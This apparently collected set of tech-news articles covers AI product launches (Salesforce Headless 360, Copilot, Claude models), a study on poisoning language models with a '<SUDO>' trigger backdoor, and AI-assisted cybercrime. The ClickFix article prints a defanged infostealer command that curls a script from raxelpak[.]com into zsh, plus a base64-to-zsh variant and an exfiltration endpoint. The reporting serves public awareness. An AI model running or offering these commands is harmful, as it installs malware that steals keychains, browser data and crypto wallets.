
Salesforce’s New “Headless 360” Lets AI Agents Run Its Platform

 


Salesforce has introduced what it describes as the most significant architectural overhaul in its 27-year history, launching a new initiative called “Headless 360.” The update is designed to allow artificial intelligence agents to control and operate the company’s entire platform without requiring a traditional graphical interface such as a dashboard or browser.

The announcement was made during the company’s annual TDX developer conference in San Francisco, where Salesforce revealed that it is releasing more than 100 new developer tools and capabilities. These tools immediately enable AI systems to interact directly with Salesforce environments. The move reflects a deeper shift in enterprise software, where the rise of intelligent agents capable of reasoning and executing tasks is forcing companies to rethink whether conventional user interfaces are still necessary.

Salesforce’s answer to that question is direct: instead of designing software primarily for human interaction, the platform is now being rebuilt so that machines can access and operate it programmatically. According to the company, this transformation began over two years ago with a strategic decision to expose all internal capabilities rather than keeping them hidden behind user interfaces.

This shift is taking place during a period of uncertainty in the broader software industry. Concerns that advanced AI models developed by companies like OpenAI and Anthropic could disrupt traditional software business models have already impacted market performance. Industry indicators, including software-focused exchange-traded funds, have declined substantially, reflecting investor anxiety about the long-term relevance of existing SaaS platforms.

Senior leadership at Salesforce has indicated that the new architecture is based on practical challenges observed while deploying AI systems across enterprise clients. According to internal insights, building an AI agent is only the initial step. Organizations also face ongoing challenges related to development workflows, system reliability, updates, and long-term maintenance.

To address these challenges, Headless 360 is structured around three foundational pillars.

The first pillar focuses on development flexibility. Salesforce has introduced more than 60 tools based on Model Context Protocol, along with over 30 pre-configured coding capabilities. These allow external AI coding agents, including systems such as Claude Code, Cursor, Codex, and Windsurf, to gain direct, real-time access to a company’s Salesforce environment. This includes data, workflows, and underlying business logic. Developers are no longer required to use Salesforce’s own integrated development environment and can instead operate from any terminal or external setup.

In addition, Salesforce has upgraded its native development environment, Agentforce Vibes 2.0, by introducing an “open agent harness.” This system supports multiple agent frameworks, including those from OpenAI and Anthropic, and dynamically adjusts capabilities depending on which AI model is being used. The platform also supports multiple models simultaneously, including advanced systems like Claude Sonnet and GPT-5, while maintaining full awareness of the organization’s data from the start.

A notable technical enhancement is the introduction of native React support. During demonstrations, developers created a fully functional application using React instead of Salesforce’s traditional Lightning framework. The application connected to Salesforce data through GraphQL while still inheriting built-in security controls. This significantly expands front-end flexibility for developers.

The second pillar focuses on deployment. Salesforce has introduced an “experience layer” that separates how an AI agent functions from how it is presented to users. This allows developers to design an experience once and deploy it across multiple platforms, including Slack, mobile applications, Microsoft Teams, ChatGPT, Claude, Gemini, and other compatible environments. Importantly, this can be done without rewriting code for each platform. The approach represents a change from requiring users to enter Salesforce interfaces to delivering Salesforce-powered experiences directly within existing workflows.
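Salesforce has not published the experience layer’s API, but the design-once, deploy-everywhere idea resembles a classic adapter pattern: agent behavior is defined once, and thin per-channel adapters handle only presentation. A minimal Python sketch (all class and field names are hypothetical, not Salesforce’s actual interfaces):

```python
# Hypothetical sketch of a "design once, deploy anywhere" experience layer.
# The agent's behavior is defined once; per-channel adapters only handle rendering.

class AgentExperience:
    """Channel-agnostic definition of what the agent says and does."""
    def respond(self, user_message: str) -> dict:
        # Core logic lives here, independent of any UI.
        return {"text": f"Order status for: {user_message}",
                "actions": ["track", "cancel"]}

class SlackAdapter:
    def render(self, payload: dict) -> dict:
        # Slack-style block layout.
        return {"blocks": [{"type": "section", "text": payload["text"]}]}

class TeamsAdapter:
    def render(self, payload: dict) -> dict:
        # Teams-style card layout.
        return {"card": {"body": payload["text"], "buttons": payload["actions"]}}

experience = AgentExperience()
payload = experience.respond("order #1234")
slack_view = SlackAdapter().render(payload)   # same logic, Slack presentation
teams_view = TeamsAdapter().render(payload)   # same logic, Teams presentation
```

The point of the pattern is that adding a new channel (ChatGPT, Gemini, mobile) means writing one new adapter, not rewriting the agent.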

The third pillar addresses trust, control, and scalability. Salesforce has introduced a comprehensive set of tools that manage the entire lifecycle of AI agents. These include systems for testing, evaluation, monitoring, and experimentation. A central component is “Agent Script,” a new programming language designed to combine structured, rule-based logic with the flexible reasoning capabilities of AI models. It allows organizations to define which parts of a process must follow strict rules and which parts can rely on AI-driven decision-making.

Additional tools include a Testing Center that identifies logical errors and policy violations before deployment, custom evaluation systems that define performance standards, and an A/B testing interface that allows multiple agent versions to run simultaneously under real-world conditions.

One of the key technical challenges addressed by Salesforce is the difference between probabilistic and deterministic systems. AI agents do not always produce identical results, which can create instability in enterprise environments where consistency is critical. Early adopters reported that once agents were deployed, even small modifications could lead to unpredictable outcomes, forcing teams to repeat extensive testing processes.

Agent Script was developed to solve this problem by introducing a structured framework. It defines agent behavior as a state machine, where certain steps are fixed and controlled while others allow flexible reasoning. This approach ensures both reliability and adaptability.
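Agent Script itself is proprietary and its syntax has not been shown here, but the underlying state-machine idea can be sketched in Python: some transitions are hard-coded rules, while one state delegates to a (stubbed) model call. All names and rules below are illustrative:

```python
# Illustrative state machine mixing deterministic steps with an AI-driven one.
# "verify" follows a fixed rule; "triage" delegates the decision to a model stub.

def model_reasoning(ticket: str) -> str:
    # Stand-in for an LLM call; a real agent would reason over the ticket here.
    return "refund" if "damaged" in ticket else "close"

def run_agent(ticket: str, amount: float) -> str:
    state = "verify"
    while True:
        if state == "verify":
            # Deterministic rule: large refunds always need a human.
            if amount > 500:
                return "escalate_to_human"
            state = "triage"
        elif state == "triage":
            # Flexible step: the model chooses the next state.
            state = model_reasoning(ticket)
        elif state == "refund":
            return "refund_issued"
        elif state == "close":
            return "ticket_closed"
```

Because the guardrail states are ordinary code, retesting after a model change only needs to cover the "triage" step; the fixed transitions behave identically every run.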

Salesforce also distinguishes between two types of AI system architectures. Customer-facing agents, such as those used in sales or support, require strict control to ensure they follow predefined rules and maintain brand consistency. These operate within structured workflows. In contrast, employee-facing agents are designed to operate more freely, exploring multiple paths and refining their outputs dynamically before presenting results. Both systems operate on a unified underlying architecture, allowing organizations to manage them without maintaining separate platforms.

The company is also expanding its ecosystem. It now supports integration with a wide range of AI models, including those from Google and other providers. A new marketplace brings together thousands of applications and tools, supported by a $50 million initiative aimed at encouraging further development.

At the same time, Salesforce is taking a flexible approach to emerging technical standards such as Model Context Protocol. Rather than relying on a single method, the company is offering APIs, command-line interfaces, and protocol-based integrations simultaneously to remain adaptable as the industry evolves.

A real-world example shared during the announcement showed how one company built an AI-powered customer service agent in just 12 days. The system now handles approximately half of customer interactions, improving efficiency while reducing operational costs.

Finally, Salesforce is also changing its business model. The company is shifting away from traditional per-user pricing toward a consumption-based approach, reflecting a future where AI agents, rather than human users, perform the majority of work within enterprise systems.

This transformation suggests a new layer in strategic operations. Instead of resisting the rise of AI, Salesforce is restructuring its platform to align with it, betting that its existing data infrastructure, enterprise integrations, and accumulated operational logic will continue to provide value even as software becomes increasingly autonomous.

Microsoft Releases AI Upgrades, Launches Copilot Cowork to Early Access Customers


In an effort to enhance its AI offerings and increase adoption, Microsoft (MSFT.O) recently introduced new features in its Copilot research assistant that enable users to employ multiple AI models concurrently within the same workflow.

Instead of relying on a single model, Copilot's Researcher agent can now pull outputs from both OpenAI's GPT and Anthropic's Claude models for each response, thanks to a new feature called "Critique."

According to Microsoft, Claude will check the quality and correctness of the response before GPT provides it to the user. In the future, the company hopes to make that workflow bidirectional so that GPT can also evaluate Claude's responses.
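Microsoft has not published how "Critique" is wired internally; conceptually it is a draft-then-review pipeline, one model drafting and a second vetting before delivery. A sketch with both model calls stubbed (all names illustrative):

```python
# Draft-then-review pipeline: one model answers, a second critiques before delivery.

def gpt_draft(question: str) -> str:
    # Stub for the drafting model (GPT in Microsoft's description).
    return f"Draft answer to: {question}"

def claude_review(draft: str) -> dict:
    # Stub for the reviewing model (Claude); flags drafts failing a simple check.
    ok = draft.startswith("Draft answer")
    return {"approved": ok, "notes": "" if ok else "needs revision"}

def critique_pipeline(question: str) -> str:
    draft = gpt_draft(question)
    review = claude_review(draft)
    if review["approved"]:
        return draft
    # In a real system the draft would loop back for another pass.
    return draft + f"\n[revise: {review['notes']}]"

answer = critique_pipeline("What changed in Copilot?")
```

The bidirectional version Microsoft describes would simply run the same pipeline with the two roles swapped.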

"Having different models from different vendors in Copilot is highly attractive - but we're taking this to the next level, where customers actually get the benefits of the models working together," Nicole Herskowitz, VP of Copilot at Microsoft, told Reuters.

Microsoft says the multi-model strategy will increase productivity and quality for customers by accelerating workflows, controlling AI hallucinations (instances where systems give incorrect information), and producing more dependable outputs.

Additionally, Microsoft is introducing a feature called "Council" that will let users compare results from various AI models side by side. The updates coincide with Microsoft expanding access to its new Copilot Cowork agentic AI tool for members of its "Frontier" program, which gives users early access to some of its most recent AI innovations.

According to Jared Spataro, who leads Microsoft's AI-at-Work efforts, “We work only in a cloud environment, and we work only on behalf of the user. So you know exactly what information it (Copilot Cowork) has access to.”

On Monday, the company's stock rose by almost 1%. However, with investor confidence in AI declining, the stock is on track for its worst quarter since the 2008 global financial crisis, down nearly 25%.

Microsoft capitalized on the increasing demand for autonomous AI agents earlier this month by releasing Copilot Cowork, a solution based on Anthropic's popular Claude Cowork product, in testing mode.

In the face of fierce competition from rivals like Google (GOOGL.O) with its Gemini assistant, and autonomous agents like Claude Cowork, the Windows maker has been rushing to enhance its Copilot assistant to drive greater usage.

Claude Mythos 5: Trillion-Parameter AI Powerhouse Unveiled

 

Anthropic has launched Claude Mythos 5, a groundbreaking AI model boasting 10 trillion parameters, positioning it as a leader in advanced artificial intelligence capabilities. This massive scale enables superior performance in demanding fields like cybersecurity, coding, and academic reasoning, surpassing many competitors in handling complex, high-stakes tasks. 

Alongside it, the mid-tier Capabara model offers efficient versatility, bridging the gap between flagship power and practical deployment, with Anthropic emphasizing a phased rollout for ethical safety. Claude Mythos 5 excels in precision and adaptability, making it ideal for cybersecurity threat detection and intricate software development where accuracy is paramount. In academic reasoning, it tackles multifaceted problems that require deep logical inference, outpacing previous models in benchmark tests.

Anthropic's commitment to responsible AI ensures these tools minimize risks like misuse, aligning innovation with accountability in real-world applications. Complementing Anthropic's releases, GLM 5.1 emerges as a key open-source milestone, excelling in instruction-following and multi-step workflows for automation tasks. Though not the fastest, its reliability fosters community-driven innovation, providing accessible alternatives to proprietary systems for developers worldwide. This model democratizes AI progress, enabling collaborative advancements without the barriers of closed ecosystems. 

Google DeepMind's Gemini 3.1 advances real-time multimodal processing for voice and vision, enhancing latency and quality in sectors like healthcare and autonomous systems. OpenAI's revamped Codex platform introduces plug-in ecosystems with pre-built workflows, streamlining coding and boosting developer productivity. Meanwhile, the ARC AGI 3 Benchmark sets a rigorous standard for agentic reasoning, combating overfitting and driving genuine AI intelligence gains.

These developments, including Mistral AI’s expressive text-to-speech and Anthropic’s biology-focused Operon, signal AI's transformative potential across industries. From ethical trillion-parameter giants to open benchmarks, they promise efficiency in research, automation, and creative workflows. As AI evolves rapidly, balancing power with safety will shape a future of innovative problem-solving.

ClickFix Campaigns Exploit Claude Artifacts to Target macOS Users with Infostealers

 

One out of every hundred Mac users searching online might now face hidden risks. Instead of helpful tools, some find traps disguised as guides - especially when looking up things like "DNS resolver" or "Homebrew." Behind these results, attackers run silent operations using fake posts linked to real services. Notably, they borrow content connected to Claude, spreading it through paid search ads on Google. Each click can lead straight into their hands. Two separate versions of this scheme are already circulating. Evidence suggests more than ten thousand people followed the harmful steps without knowing. Most never realized what was taken. Quiet but widespread, the pattern reveals how easily trust gets hijacked in plain sight.

Beginning with public posts shaped by Anthropic’s AI, a Claude artifact emerges when someone shares output from the system online. Hosted on claude.ai, such material might include scripts, how-tos, or fragments of working code - open for viewing through shared URLs. During recent ClickFix operations, deceptive search entries reroute people toward counterfeit versions of these documents. Instead of genuine help, visitors land on forged Medium pieces mimicking Apple's support site. From there, directions appear telling them to insert command-line strings straight into Terminal. Though it feels harmless at first glance, that single step triggers the start of compromise. 

The technical execution of these attacks involves two primary command variants. One common method utilizes an `echo` command, which is then piped through `base64 -D | zsh` for execution. The second variant employs a `curl` command to covertly fetch and execute a remote script: `true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh`. Upon successful execution of either command, the MacSync infostealer is deployed onto the macOS system. This potent malware is specifically engineered to exfiltrate a wide array of sensitive user data, including crucial keychain information, browser data, and cryptocurrency wallet details. 
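The first variant works by hiding the real script inside a base64 blob that only becomes readable after decoding, which is exactly why victims cannot see what they are about to run. A safe inspection habit is to decode such a payload without piping it to a shell; a harmless Python illustration (the encoded string here is benign, standing in for a real payload):

```python
import base64

# A benign stand-in for the kind of base64 blob seen in these campaigns.
# On macOS the attack decodes with `base64 -D` and pipes straight into zsh;
# decoding it yourself first reveals the script WITHOUT executing it.
blob = base64.b64encode(b'echo "this could have been any shell script"').decode()

decoded = base64.b64decode(blob).decode()
print(decoded)  # inspect first; never pipe untrusted blobs into a shell
```

Anything that looks like a command rather than data after decoding is a strong signal to stop and investigate before running it.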

One way attackers stay hidden involves disguising their traffic as ordinary web requests. A suspicious Claude guide, spotted by Moonlock Lab analysts, reached more than 15,600 users - an indicator of wide exposure. Instead of sending raw information, the system bundles stolen content neatly into a ZIP file, often stored temporarily under `/tmp/osalogging.zip`. This package then travels outward through an HTTP POST directed at domains such as `a2abotnet[.]com/gate`. Behind the scenes, access relies on fixed credentials: a preset token and API key baked directly into the code. For extra stealth, it mimics a macOS-based browser's digital fingerprint during exchanges. When uploads stall, the archive splits into lighter segments, allowing repeated tries - up to eight attempts occur if needed. Once delivery finishes, leftover files vanish instantly, leaving minimal evidence behind.  

This latest operation looks much like earlier efforts where hackers used chat-sharing functions in major language models - like ChatGPT and Grok - to spread the AMOS infostealer. What makes the shift toward targeting Claude notable is how attackers keep expanding their methods across different AI systems. Because of this, users need to stay highly alert, especially when it comes to running Terminal instructions they do not completely trust. One useful check, pointed out by Kaspersky analysts, means pausing first to ask the same assistant about any command’s intent and risk before carrying it out.

Anthropic Launches “Claude for Healthcare” to Help Users Better Understand Medical Records

 
Anthropic has joined the growing list of artificial intelligence companies expanding into digital health, announcing a new set of tools that enable users of its Claude platform to make sense of their personal health data.

The initiative, titled Claude for Healthcare, allows U.S.-based subscribers on Claude Pro and Max plans to voluntarily grant Claude secure access to their lab reports and medical records. This is done through integrations with HealthEx and Function, while support for Apple Health and Android Health Connect is set to roll out later this week via the company’s iOS and Android applications.

“When connected, Claude can summarize users' medical history, explain test results in plain language, detect patterns across fitness and health metrics, and prepare questions for appointments,” Anthropic said. “The aim is to make patients' conversations with doctors more productive, and to help users stay well-informed about their health.”

The announcement closely follows OpenAI’s recent launch of ChatGPT Health, a dedicated experience that lets users securely link medical records and wellness apps to receive tailored insights, lab explanations, nutrition guidance, and meal suggestions.

Anthropic emphasized that its healthcare integrations are built with privacy at the core. Users have full control over what information they choose to share and can modify or revoke Claude’s access at any time. Similar to OpenAI’s approach, Anthropic stated that personal health data connected to Claude is not used to train its AI models.

The expansion arrives amid heightened scrutiny around AI-generated health guidance. Concerns have grown over the potential for harmful or misleading medical advice, highlighted recently when Google withdrew certain AI-generated health summaries after inaccuracies were discovered. Both Anthropic and OpenAI have reiterated that their tools are not replacements for professional medical care and may still produce errors.

In its Acceptable Use Policy, Anthropic specifies that outputs related to high-risk healthcare scenarios—such as medical diagnosis, treatment decisions, patient care, or mental health—must be reviewed by a qualified professional before being used or shared.

“Claude is designed to include contextual disclaimers, acknowledge its uncertainty, and direct users to healthcare professionals for personalized guidance,” Anthropic said.

Anthropic Introduces Claude Opus 4.5 With Lower Pricing, Stronger Coding Abilities, and Expanded Automation Features

 



Anthropic has unveiled Claude Opus 4.5, a new flagship model positioned as the company’s most capable system to date. The launch marks a defining shift in the pricing and performance ecosystem, with the company reducing token costs and highlighting advances in reasoning, software engineering accuracy, and enterprise-grade automation.

Anthropic says the new model delivers improvements across both technical benchmarks and real-world testing. Internal materials reviewed by industry reporters show that Opus 4.5 surpassed the performance of every human candidate who previously attempted the company’s most difficult engineering assignment, when the model was allowed to generate multiple attempts and select its strongest solution. Without a time limit, the model’s best output matched the strongest human result on record through the company’s coding environment. While these tests do not reflect teamwork or long-term engineering judgment, the company views the results as an early indicator of how AI may reshape professional workflows.

Pricing is one of the most notable shifts. Opus 4.5 is listed at roughly five dollars per million input tokens and twenty-five dollars per million output tokens, a substantial decrease from the rates attached to earlier Opus models. Anthropic states that this reduction is meant to broaden access to advanced capabilities and push competitors to re-evaluate their own pricing structures.
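At those list rates, per-call cost is straightforward to estimate. A small sketch using the reported figures (five dollars per million input tokens, twenty-five per million output tokens):

```python
# Token-cost estimate at the reported Opus 4.5 list prices.
INPUT_PER_M = 5.00    # USD per million input tokens (as reported)
OUTPUT_PER_M = 25.00  # USD per million output tokens (as reported)

def call_cost(input_tokens: int, output_tokens: int) -> float:
    """Estimated USD cost of a single API call at the list rates above."""
    return (input_tokens / 1_000_000 * INPUT_PER_M
            + output_tokens / 1_000_000 * OUTPUT_PER_M)

# e.g. a 20,000-token prompt with a 2,000-token reply:
cost = call_cost(20_000, 2_000)  # 0.10 + 0.05 = 0.15 USD
```

The asymmetry matters in practice: output tokens cost five times more than input, so the token-efficiency gains Anthropic claims for this generation translate directly into the output side of this formula.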

In performance testing, Opus 4.5 achieved an 80.9 percent score on the SWE-bench Verified benchmark, which evaluates a model’s ability to resolve practical coding tasks. That score places it above recently released systems from other leading AI labs, including Anthropic’s own Sonnet 4.5 and models from Google and OpenAI. Developers involved in early testing also reported that the model shows stronger judgment in multi-step tasks. Several testers said Opus 4.5 is more capable of identifying the core issue in a complex request and structuring its response around what matters operationally.

A key focus of this generation is efficiency. According to Anthropic, Opus 4.5 can reach or exceed the performance of earlier Claude models while using far fewer tokens. Depending on the task, reductions in output volume reached as high as seventy-six percent. To give organisations more control over cost and latency, the company introduced an effort parameter that lets users determine how much computational work the model applies to each request.

Enterprise customers participating in early trials reported measurable gains. Statements from companies in software development, financial modelling, and task automation described improvements in accuracy, lower token consumption, and faster completion of complex assignments. Some organisations testing agent workflows said the system was able to refine its approach over multiple runs, improving its output without modifying its underlying parameters.

Anthropic launched several product updates alongside the model. Claude for Excel is now available to higher-tier plans and includes support for charts, pivot tables, and file uploads. The Chrome extension has been expanded, and the company introduced an infinite chat feature that automatically compresses earlier conversation history, removing traditional context window limitations. Developers also gained access to new programmatic tools, including parallel agent sessions and direct function calling.

The release comes during an intense period of competition across the AI sector, with major firms accelerating release cycles and investing heavily in infrastructure. For organisations, the arrival of lower-cost, higher-accuracy systems could further accelerate the adoption of AI for coding, analysis, and automated operations, though careful validation remains essential before deploying such capabilities in critical environments.



AI Models Can Create Backdoors, Research Says


Scraping the internet for AI training data has risks. Experts from Anthropic, the Alan Turing Institute, and the UK AI Security Institute released a paper finding that LLMs like Claude, ChatGPT, and Gemini can develop backdoor vulnerabilities from just 250 corrupted documents fed into their training data.

This means an attacker can hide malicious documents inside training data to control how an LLM responds to prompts.

About the research 

The researchers trained LLMs ranging from 600 million to 13 billion parameters. Although the larger models processed over 20 times more training data, all models showed the same backdoor behaviour after ingesting the same number of malicious examples.

According to Anthropic, earlier studies on training-data threats had suggested such attacks would become harder as models grew bigger.

Talking about the study, Anthropic said it "represents the largest data poisoning investigation to date and reveals a concerning finding: poisoning attacks require a near-constant number of documents regardless of model size." 

The Anthropic team studied a backdoor in which particular trigger prompts cause models to output gibberish text instead of coherent answers. Each corrupted document contained normal text, a trigger phrase such as "<SUDO>", and random tokens. The experts chose this behaviour because it could be measured during training.

The findings apply to attacks that generate gibberish answers or switch languages; it is unclear whether the same pattern holds for more advanced malicious behaviours. The experts said more sophisticated attacks, such as inducing models to write vulnerable code or disclose sensitive information, may require different amounts of corrupted data.

How models learn from malicious examples 

LLMs such as ChatGPT and Claude train on huge amounts of text taken from the open web, including blog posts and personal websites, so your own online content may end up in an AI model's training data. This open access creates an attack surface: threat actors can plant particular patterns to teach a model malicious behaviours.

In 2024, researchers from ETH Zurich, Carnegie Mellon, Google, and Meta found that threat actors controlling 0.1% of pretraining data could introduce backdoors for malicious purposes. For larger models, however, that fraction implies far more malicious documents: if a model is trained on billions of documents, 0.1% amounts to millions of them.
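The contrast between the two findings is easy to quantify: under the fractional assumption the number of poisoned documents grows with corpus size, while the new finding says it stays near-constant. A quick sketch of the arithmetic:

```python
# Comparing the 2024 fractional estimate with the near-constant finding.

def docs_needed_fractional(dataset_size: int, fraction: float = 0.001) -> int:
    # 0.1% of the pretraining corpus, as in the 2024 study.
    return round(dataset_size * fraction)

NEAR_CONSTANT = 250  # documents, per the Anthropic-led study

small_corpus = docs_needed_fractional(10_000_000)     # 10M docs -> 10,000 poisoned
large_corpus = docs_needed_fractional(2_000_000_000)  # 2B docs -> 2,000,000 poisoned
```

If the near-constant result holds, the attack gets cheaper relative to corpus size as models scale, which is the opposite of what the fractional model predicted and is why the researchers call the finding concerning.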

Anthropic to Use Your Chats with Claude to Train Its AI



Anthropic announced last week that it will update its terms of service and privacy policy to allow the use of chats for training its AI model, Claude. Users across all consumer subscription tiers (Claude Free, Pro, and Max, along with Claude Code) will be affected by the update. Anthropic's new Consumer Terms and Privacy Policy take effect on September 28, 2025.

However, users of Claude under commercial licenses such as the Work, Team, and Enterprise plans, Claude Education, and Claude Gov are exempt. Third-party users who access the Claude API through Google Cloud's Vertex AI or Amazon Bedrock will also be unaffected by the new policy.

If you are a Claude user, you can postpone accepting the new policy by choosing 'Not now'; after September 28, however, your account will be opted in by default to share chat transcripts for training the AI model.

Why the new policies?

The new policy follows the generative-AI boom, in which demand for massive amounts of training data has prompted various tech companies to quietly rethink and update their terms of service. These changes let companies use your data to train their own AI models or pass it to other companies to improve theirs.

"By participating, you’ll help us improve model safety, making our systems for detecting harmful content more accurate and less likely to flag harmless conversations. You’ll also help future Claude models improve at skills like coding, analysis, and reasoning, ultimately leading to better models for all users," Anthropic said.

Concerns around user safety

Earlier this year, in July, WeTransfer, a well-known file-sharing platform, drew controversy when it changed its terms of service agreement, facing immediate backlash from users and the online community. WeTransfer had sought the right to use files uploaded to its platform to improve machine learning models. After the incident, the platform moved to fix things by removing "any mention of AI and machine learning from the document," according to the Indian Express.

With rising concerns over the use of personal data for training AI models that compromise user privacy, companies are now offering users the option to opt out of data training for AI models.

Hackers Used Anthropic’s Claude to Run a Large Data-Extortion Campaign

 



A security bulletin from Anthropic describes a recent cybercrime campaign in which a threat actor used the company’s Claude AI system to steal data and demand payment. According to Anthropic’s technical report, the attacker targeted at least 17 organizations across healthcare, emergency services, government and religious sectors. 

This operation did not follow the familiar ransomware pattern of encrypting files. Instead, the intruder quietly removed sensitive information and threatened to publish it unless victims paid. Some demands were very large, with reported ransom asks reaching into the hundreds of thousands of dollars. 

Anthropic says the attacker ran Claude inside a coding environment called Claude Code, and used it to automate many parts of the hack. The AI helped find weak points, harvest login credentials, move through victim networks and select which documents to take. The criminal also used the model to analyze stolen financial records and set tailored ransom amounts. The campaign generated alarming HTML ransom notices that were shown to victims. 

Anthropic discovered the activity and took steps to stop it. The company suspended the accounts involved, expanded its detection tools and shared technical indicators with law enforcement and other defenders so similar attacks can be detected and blocked. News outlets and industry analysts say this case is a clear example of how AI tools can be misused to speed up and scale cybercrime operations. 


Why this matters for organizations and the public

AI systems that can act automatically introduce new risks because they let attackers combine technical tasks with strategic choices, such as which data to expose and how much to demand. Experts warn defenders must upgrade monitoring, enforce strong authentication, segment networks and treat AI misuse as a real threat that can evolve quickly. 

The incident shows threat actors are experimenting with agent-like AI to make attacks faster and more precise. Companies and public institutions should assume this capability exists and strengthen basic cyber hygiene while working with vendors and authorities to detect and respond to AI-assisted threats.